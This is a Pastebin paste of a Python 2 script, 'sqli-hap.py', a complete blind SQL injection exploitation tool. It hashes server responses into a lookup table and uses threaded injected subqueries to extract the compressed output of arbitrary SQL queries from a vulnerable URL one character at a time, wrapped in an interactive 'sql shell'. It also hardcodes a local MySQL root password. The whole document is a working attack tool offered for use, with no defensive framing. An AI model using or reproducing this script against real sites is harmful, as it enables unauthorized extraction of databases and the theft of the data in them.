Advertisement
opexxx

sqli-hap.py

Sep 25th, 2013
170
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.12 KB | None | 0 0
  1. #!/usr/bin/python2
  2. #!/usr/bin/python2
  3. import sys
  4. import urllib2
  5. import time
  6. from binascii import hexlify
  7. import _mysql
  8. import md5
  9. import pickle
  10. import re
  11. import os
  12. import threading
  13. import Queue
  14. import readline
  15. readline.parse_and_bind('tab: complete')
  16. readline.parse_and_bind('set editing-mode vi')
  17.  
  18. BOLD = '\033[1m'
  19. BLUE = '\033[34m'
  20. GREEN = '\033[32m'
  21. YELLOW = '\033[33m'
  22. RED = '\033[91m'
  23. ENDC = '\033[0m'
  24.  
  25. def request(request_url):
  26.   req = urllib2.Request(request_url)
  27.   req.add_header = ('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.17 (KHTML, like Gecko)' \
  28.                                   ' Chrome/24.0.1309.0 Safari/537.17')
  29.   r = urllib2.urlopen(req)
  30.   return r.read()
  31.  
  32. def construct_discovery_query(url, column, table, counter):
  33.   discovery = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) x where pos=%s)"
  34.   discovery =  discovery % (column, column, table, counter)
  35.   return url + urllib2.quote(discovery)
  36.  
  37. def construct_injection_query(url, column, table, query, position):
  38.   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  39.               "x where pos=ascii(substring(compress((%s)) from %s for 1)))"
  40.   injection = injection % (column, column, table, query, position)
  41.   return url + urllib2.quote(injection)
  42.  
  43. def get_length(url, column, table, query, ascii_table, counter):
  44.   injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  45.               "x where pos=(length(length(compress((%s))))))" % (column, column, table, query)
  46.   length_length = url + urllib2.quote(injection)
  47.   length_length = ascii_table[md5.new(request(length_length)).digest()]
  48.   counter += 1
  49.  
  50.   length = ""
  51.   for i in range(1,length_length+1):
  52.     injection = "(select %s from (select %s,@r:=@r+1 as pos from %s c join (select @r:=0) r limit 255) " \
  53.                 "x where pos=ascii(substring(length(compress((%s))) from %s for 1)))"
  54.     injection = injection % (column, column, table, query, i)
  55.     request_url = url + urllib2.quote(injection)
  56.     length += chr(ascii_table[md5.new(request(request_url)).digest()])
  57.     counter += 1
  58.  
  59.   return (int(length), counter)
  60.  
  61. def get_query(prompt):
  62.   while 1:
  63.     query = raw_input(prompt)
  64.     if query != "":
  65.       break
  66.   return query
  67.  
  68. def do_query(url, column, table, query, ascii_table, i, q):
  69.   tmp = construct_injection_query(url, column, table, query, i)
  70.   q.put(chr(ascii_table[md5.new(request(tmp)).digest()]))
  71.  
  72. def do_table(url, column, table, i, q):
  73.   tmp = construct_discovery_query(url, column, table, i)
  74.   q.put(md5.new(request(tmp)).digest())
  75.  
  76. def print_percent(percent, start_time):
  77.   elapsed_time = time.time() - start_time
  78.   eta = ((elapsed_time) / percent) * 100 - elapsed_time
  79.   sys.stdout.write("\r%s[*]%s Percent complete: %s%.2f%%%s -- Time elapsed: %s%.2f%s seconds -- Estimated time left: %s%.2f%s"
  80.                    % (GREEN, ENDC, YELLOW, percent, ENDC, YELLOW, elapsed_time, ENDC, YELLOW, eta, ENDC))
  81.   sys.stdout.flush()
  82.  
  83. def do_thread(target, args, counter, length, type_query):
  84.   if type_query == 0:
  85.     ascii_table = {}
  86.   else:
  87.     query_result = ""
  88.  
  89.   if type_query == 0:
  90.     i = 0
  91.   else:
  92.     i = 1
  93.  
  94.  
  95.   sys.stdout.write("\r%s[*]%s Percent complete: %.2f%%" % (GREEN, ENDC, 0.0))
  96.   sys.stdout.flush()
  97.   start_time = time.time()
  98.  
  99.   while i < length:
  100.     threads = {}
  101.     queues  = []
  102.  
  103.     for j in range(0,11):
  104.       if i < length:
  105.         queues.append(Queue.Queue())
  106.         threads[i] = threading.Thread(target=target, args=args + (i, queues[j]))
  107.         i += 1
  108.         counter += 1
  109.         print_percent(100 * float(i) / float(length), start_time)
  110.  
  111.     for thread in threads:
  112.       threads[thread].start()
  113.  
  114.     for j, thread in enumerate(sorted(threads.iterkeys())):
  115.       if type_query == 0:
  116.         ascii_table[queues[j].get()] = thread
  117.       else:
  118.         query_result += queues[j].get()
  119.       threads[thread].join()
  120.  
  121.   sys.stdout.write('\n')
  122.   sys.stdout.flush()
  123.  
  124.   if type_query == 0:
  125.     return ascii_table
  126.   else:
  127.     return (counter, query_result)
  128.  
  129. def main(url, column, table):
  130.   session_name = re.split("(https?://)?(.*)/", url)[2]
  131.  
  132.   print "%s[*]%s Checking for existing session" % (GREEN, ENDC)
  133.   try:
  134.     try:
  135.       os.stat("data")
  136.     except:
  137.       os.mkdir("data")
  138.     ascii_table = pickle.load(open("data/%s" % session_name, "rb" ))
  139.     print "%s[*]%s Loaded precomputation table." % (GREEN, ENDC)
  140.   except:
  141.     print "%s[*]%s Building precomputation table.." % (GREEN, ENDC)
  142.     current = time.time()
  143.     ascii_table = do_thread(do_table, (url, column, table, ), 0, 256, 0)
  144.     pickle.dump(ascii_table, open("data/%s" % session_name, "wb"))
  145.     print "\n%s[*]%s Precomputation table built in %s%f%s seconds." % (GREEN, ENDC, YELLOW, time.time() - current, ENDC)
  146.  
  147.   print "%s[*]%s Enter a sql query:" % (GREEN, ENDC)
  148.  
  149.   while 1:
  150.     query = get_query("%ssql shell>%s " % (BOLD, ENDC))
  151.     if query == "exit":
  152.       break
  153.  
  154.     query_result = ""
  155.     counter = 0
  156.     current = time.time()
  157.     (length, counter) = get_length(url, column, table, query, ascii_table, counter)
  158.  
  159.     (counter, query_result) = do_thread(do_query, (url, column, table, query, ascii_table, ), counter, length+1, 1)
  160.  
  161.     query = "SELECT UNCOMPRESS(0x%s)" % hexlify(query_result)
  162.     mysql_connection = _mysql.connect('localhost', 'root', 'new-password')
  163.     mysql_connection.query(query)
  164.     result = mysql_connection.use_result()
  165.     data = result.fetch_row()[0][0]
  166.     mysql_connection.close()
  167.  
  168.     print data
  169.     print "\nRequests: %s%d%s (%s%f%s seconds)\nLength of retrieved data: %s%s%d%s%s"
  170.           % (YELLOW, counter, ENDC, YELLOW, time.time() - current, ENDC, BOLD, YELLOW, len(data), ENDC, ENDC)
  171.  
  172.   print "%s[*]%s Good bye" % (GREEN, ENDC)
  173.  
  174. if __name__=="__main__":
  175.   if len(sys.argv) != 4:
  176.     print "Usage: %s <vulnerable url> <column name> <table name>" % sys.argv[0]
  177.     exit()
  178.  
  179.   print "%s[*]%s Attacking: %s%s%s%s%s" % (GREEN, ENDC, BOLD, RED, sys.argv[1], ENDC, ENDC)
  180.   main(sys.argv[1], sys.argv[2], sys.argv[3])
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement